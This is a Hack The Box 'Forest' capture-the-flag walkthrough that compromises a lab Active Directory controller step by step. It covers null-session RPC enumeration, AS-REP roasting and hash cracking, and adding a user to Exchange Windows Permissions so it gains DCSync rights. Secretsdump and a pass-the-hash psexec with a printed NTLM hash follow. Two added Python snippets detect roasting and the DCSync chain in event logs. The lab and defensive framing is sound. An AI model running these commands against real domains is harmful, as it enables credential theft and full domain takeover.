Hack The Box: Forest

Walkthrough

  • Nmap
  • Enumerate Users through RPC NullSession
  • AS-REP Roast and Hash cracking
  • Login with Evil-Winrm
  • Domain enumeration with bloodhound
  • ACL Abuse to grant DCSync permissions

Getting Foothold

Nmap

First of all I performed an nmap port scan to reveal all open ports.

Kerberos on port 88 indicates that this box is a Windows Domain Controller.

Further investigation of the LDAP port 389 reveals the machine's hostname and the domain's FQDN. Both names were added to the attacker's /etc/hosts file.

Since there is no website running we are left with the other services. I usually start by looking at the SMB, RPC and LDAP ports.

First I tried to log on using a null session, i.e. without a user name or password. RPC enumeration can be done manually or with enum4linux.

For manual enumeration I used rpcclient and was able to log on with a null session using the following command:

rpcclient -U '' -N forest.htb.local

To enumerate valid domain users I ran the command enumdomusers, which listed all domain users. From this information I created a username list.

Now we have a list of valid usernames but no credentials. A password spray didn't get us any further, so the next thing I tried was AS-REP Roasting using impacket.

impacket-GetNPUsers htb.local/ -usersfile usernames.txt -format hashcat -dc-ip 10.10.10.161

This resulted in a hash for the user svc-alfresco@htb.local, which means that account has Kerberos pre-authentication disabled.

So I copied that hash into a local file and cracked it with hashcat using rockyou.txt.

Cracking the hash was successful, so we now have valid credentials for a domain user.
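Seen from the blue team side, this step works because svc-alfresco does not require Kerberos pre-authentication, and a roasting run leaves a recognisable trace on the DC. The following Python snippet is an added example and not part of the original walkthrough: it flags accounts whose userAccountControl carries the DONT_REQ_PREAUTH bit (0x400000) and scans Security event 4768 records for TGT requests with pre-authentication type 0 and RC4 (0x17) ticket encryption, which is the combination GetNPUsers produces. The account list, the event records and the client address 10.10.14.5 are constructed sample data in a simplified key=value format, not real exports from the box.

```python
"""Defender's view of AS-REP roasting (added example with constructed data).

Check 1: which accounts are exposed, i.e. have DONT_REQ_PREAUTH (0x400000)
         set in userAccountControl.
Check 2: which TGT requests look like roasting: Security event 4768 with
         PreAuthType 0 (no pre-authentication) and RC4 ticket encryption
         (0x17), the combination GetNPUsers produces by default.
"""

DONT_REQ_PREAUTH = 0x400000  # userAccountControl bit "Do not require Kerberos preauthentication"

# Constructed sample of a directory export: (sAMAccountName, userAccountControl)
SAMPLE_ACCOUNTS = [
    ("svc-alfresco", 0x410200),  # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH
    ("sebastien", 0x10200),      # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    ("lucinda", 0x10200),
]

# Constructed sample of event 4768 records, one record per line as key=value fields.
# 10.10.14.5 stands in for the roasting client; 10.10.10.161 is the DC itself.
SAMPLE_4768 = """\
EventID=4768 TargetUserName=svc-alfresco IpAddress=::ffff:10.10.14.5 TicketEncryptionType=0x17 PreAuthType=0 Status=0x0
EventID=4768 TargetUserName=sebastien IpAddress=::ffff:10.10.10.161 TicketEncryptionType=0x12 PreAuthType=2 Status=0x0
EventID=4768 TargetUserName=lucinda IpAddress=::ffff:10.10.14.5 TicketEncryptionType=0x17 PreAuthType=2 Status=0x0
EventID=4768 TargetUserName=andy IpAddress=::ffff:10.10.14.5 TicketEncryptionType=0x12 PreAuthType=0 Status=0x6
"""


def accounts_without_preauth(accounts):
    """Return the names of accounts whose UAC has DONT_REQ_PREAUTH set."""
    return [name for name, uac in accounts if uac & DONT_REQ_PREAUTH]


def parse_kv_line(line):
    """Parse 'key=value key=value ...' into a dict (values here contain no spaces)."""
    return dict(field.split("=", 1) for field in line.split())


def asrep_roast_hits(log_text):
    """Return (account, client) pairs for successful 4768s issued without
    pre-authentication and with an RC4 ticket: the AS-REP roasting signature."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_kv_line(line)
        if ev.get("EventID") != "4768" or ev.get("Status") != "0x0":
            continue  # only a successfully issued TGT yields a crackable blob
        if ev.get("PreAuthType") == "0" and ev.get("TicketEncryptionType") == "0x17":
            client = ev.get("IpAddress", "")
            if client.startswith("::ffff:"):  # strip the IPv4-mapped prefix Windows logs
                client = client[len("::ffff:"):]
            hits.append((ev["TargetUserName"], client))
    return hits


if __name__ == "__main__":
    print("Accounts without pre-auth:", accounts_without_preauth(SAMPLE_ACCOUNTS))
    print("Roasting hits (account, client):", asrep_roast_hits(SAMPLE_4768))
```

The first check is the fix: clearing the flag on the account removes the exposure entirely. The second check is the fallback for accounts that must keep it, where a long, random password and AES-only Kerberos encryption make the returned blob useless to a cracker.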

A quick check of which services accept these credentials confirmed that we have WinRM access to the machine.

Using evil-winrm we can now access the machine and retrieve the user flag.

Escalating Privileges

The user doesn't have any interesting privileges but is a member of a few Active Directory groups. To explore the AD environment, SharpHound and BloodHound were used.

Using evil-winrm the SharpHound collection was downloaded and then imported into BloodHound.

Here we can already mark SVC-ALFRESCO@HTB.LOCAL as owned. Viewing its group memberships we can see that SVC-ALFRESCO@HTB.LOCAL is a member of the group SERVICE ACCOUNTS@HTB.LOCAL.

This group is a member of PRIVILEGED IT ACCOUNTS@HTB.LOCAL, which in turn is a member of ACCOUNT OPERATORS@HTB.LOCAL. Account Operators is able to modify the EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL group.

That group has permission to write the DACL of the domain object, which would allow us to grant a user of our choosing DCSync rights.

So let's do it.

First we need to modify the EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL group and add a new user to it. Since svc-alfresco is a member of ACCOUNT OPERATORS@HTB.LOCAL, it should be able to add the newly created user MHT to that group.

We can do this with a simple net group command:

net group "EXCHANGE WINDOWS PERMISSIONS" MHT /add /domain

After that we can add a new ACE to the domain object's ACL granting the new user MHT DCSync rights. The complete sequence, using Add-DomainObjectAcl from PowerView, looks like this:

net user MHT co3WrEIt /add /domain
net group "EXCHANGE WINDOWS PERMISSIONS" MHT /add /domain
$SecPassword = ConvertTo-SecureString 'co3WrEIt' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb.local\MHT', $SecPassword)
Add-DomainObjectAcl -TargetIdentity 'DC=htb,DC=local' -PrincipalIdentity MHT -Rights DCSync -PrincipalDomain htb.local -TargetDomain htb.local -Cred $Cred

And now we can DCSync with those credentials, resulting in full ownership of the domain.

impacket-secretsdump htb.local/MHT:co3WrEIt@10.10.10.161
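Every step of this chain is visible in the DC's Security log if object auditing is enabled: the member added to EXCHANGE WINDOWS PERMISSIONS (events 4728/4732/4756 depending on group scope), the rewritten DACL of the domain object (event 5136 on nTSecurityDescriptor) and the replication request itself (event 4662 with the control-access bit and the DS-Replication-Get-Changes GUIDs). The Python snippet below is an added detection example, not part of the original walkthrough. The event records are constructed to mirror the sequence above in a simplified key=value format, the replication-right GUIDs are the real schema values, and the allow-list of machine accounts permitted to replicate assumes the DC's computer account is FOREST$ (derived from the hostname, not confirmed on the page).

```python
"""Defender's view of the escalation chain (added example with constructed data).

Three things in this walkthrough leave traces in the DC's Security log:
  - a member added to a sensitive group      -> event 4728 / 4732 / 4756
  - the DACL of the domain object rewritten  -> event 5136 on nTSecurityDescriptor
  - a DCSync replication request             -> event 4662 with control access (0x100)
                                                and the DS-Replication-* rights GUIDs
Records are modelled as 'key=value|key=value' lines; '|' is the field separator
because group names contain spaces.
"""

# Extended-rights GUIDs a DCSync needs (these are the real AD schema values)
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
CONTROL_ACCESS = 0x100  # ADS_RIGHT_DS_CONTROL_ACCESS bit in the 4662 AccessMask
GROUP_ADD_EVENTS = {"4728", "4732", "4756"}  # member added to global / local / universal security group
WATCHED_GROUPS = {"Exchange Windows Permissions", "Account Operators", "Domain Admins"}
DC_ACCOUNTS = frozenset({"FOREST$"})  # machine accounts allowed to replicate (assumed DC account name)

# Constructed sample log following the chain in the writeup (fields simplified;
# the last Properties value is a placeholder for some unrelated property GUID)
SAMPLE_LOG = """\
EventID=4720|SubjectUserName=svc-alfresco|TargetUserName=MHT
EventID=4756|SubjectUserName=svc-alfresco|TargetUserName=Exchange Windows Permissions|MemberName=CN=MHT,CN=Users,DC=htb,DC=local
EventID=5136|SubjectUserName=MHT|ObjectDN=DC=htb,DC=local|AttributeLDAPDisplayName=nTSecurityDescriptor
EventID=4662|SubjectUserName=MHT|ObjectType=domainDNS|AccessMask=0x100|Properties=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
EventID=4662|SubjectUserName=FOREST$|ObjectType=domainDNS|AccessMask=0x100|Properties=1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
EventID=4662|SubjectUserName=sebastien|ObjectType=user|AccessMask=0x10|Properties=deadbeef-0000-0000-0000-000000000000
"""


def parse_event(line):
    """Parse one constructed record into a dict; only the first '=' of a field splits key from value."""
    return dict(field.split("=", 1) for field in line.strip().split("|"))


def is_dcsync(ev, dc_accounts=DC_ACCOUNTS):
    """True for a 4662 by a non-DC principal exercising a replication control access right."""
    if ev.get("EventID") != "4662" or ev.get("SubjectUserName") in dc_accounts:
        return False
    if not int(ev.get("AccessMask", "0"), 16) & CONTROL_ACCESS:
        return False
    requested = set(ev.get("Properties", "").lower().split(";"))
    return bool(requested & REPLICATION_RIGHTS)


def detect(log_text, dc_accounts=DC_ACCOUNTS):
    """Walk the records and return (alert, actor, detail) tuples in log order."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        eid = ev.get("EventID")
        if eid in GROUP_ADD_EVENTS and ev.get("TargetUserName") in WATCHED_GROUPS:
            alerts.append(("group-add", ev["SubjectUserName"], ev["TargetUserName"]))
        elif (eid == "5136" and ev.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor"
              and ev.get("ObjectDN", "").upper().startswith("DC=")):
            # a DACL change on the domain head itself (DN starts with DC=) is rare and worth an alert
            alerts.append(("dacl-write", ev["SubjectUserName"], ev["ObjectDN"]))
        elif is_dcsync(ev, dc_accounts):
            alerts.append(("dcsync", ev["SubjectUserName"], ev["ObjectType"]))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The DC allow-list matters: domain controllers replicate from each other constantly and legitimately produce 4662s with these GUIDs, so the rule keys on who asked rather than on the right alone. The 4756 record is matched by group name only for readability; in production the group SID is the stable key, since groups can be renamed.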

Now that we have the Domain Administrator's NTLM hash we can use Pass-the-Hash to get Domain Administrator access and obtain root.txt.

impacket-psexec htb.local/Administrator@10.10.10.161 -hashes :32693b11e6aa90eb43d32c72a07ceea6
